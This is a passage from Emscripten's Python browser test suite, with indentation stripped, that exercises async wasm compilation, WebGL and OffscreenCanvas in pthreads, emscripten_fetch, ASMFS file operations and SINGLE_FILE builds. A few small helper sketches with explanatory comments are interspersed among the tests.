return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define a "Module.locateFile(foo)" function to locate where test.wasm will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
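# The three builds above encode the expected size ordering: TEXTDECODER=2
# (TextDecoder required, no fallback) < TEXTDECODER=0 (manual decoder only) <
# the default (TextDecoder plus the manual fallback). A minimal sketch of the
# measure-and-compare pattern, written as a hypothetical standalone helper
# (it assumes, like the test above, that the build leaves its output in test.js):
def measure_js_size(test_case, mode=None):
  # Build hello world with the given TEXTDECODER mode (default build when
  # mode is None) and return the size of the generated JS.
  args = [] if mode is None else ['-s', 'TEXTDECODER=%d' % mode]
  test_case.btest('browser_test_hello_world.c', '0', args=args)
  return os.path.getsize('test.js')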
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5453), 100)
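# A sketch of the "absolute size within slack" assertion used above, factored
# as a hypothetical helper; the 5453-byte figure is a recorded baseline that
# must be updated whenever codegen or the test harness changes:
def assert_size_near(test_case, path, baseline, slack=100):
  # Fail when the output drifts more than `slack` bytes from the baseline.
  size = os.path.getsize(path)
  test_case.assertLess(abs(size - baseline), slack)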
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread after it has first been used to render WebGL content in a pthread
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, when using Chrome as the browser,
# you may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env var.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, when using Chrome as the browser,
# you may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env var.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also, there is a known bug with baseInstance on Mac Intel that can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES2'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via the automatic transfer of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that the shell HTML page can preallocate the typed array and place it
# in Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js-only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/from_thread.cpp',
expected='42',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
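# Size arithmetic for the construction above: the 8-byte seed doubles 14
# times, so len(s) == 8 * 2**14 == 2**17 bytes (128KB), and 1024 writes of it
# total 2**27 bytes (128MB).
assert 8 * 2 ** 14 * 1024 == 128 * 1024 * 1024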
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, an append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(test_file('pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(test_file('pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([test_file('pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(test_file('pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
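# For reference, the fallback exercised above must decode the SINGLE_FILE
# payload without the browser's atob(). A minimal sketch of the equivalent
# decode in Python (illustrative only; the real fallback lives in the
# Emscripten JS runtime):
def decode_data_uri(uri):
  import base64
  # Split "data:<mime>;base64,<payload>" and decode the payload manually.
  header, _, payload = uri.partition(',')
  assert header.endswith(';base64'), 'expected a base64 data URI'
  return base64.b64decode(payload)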
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
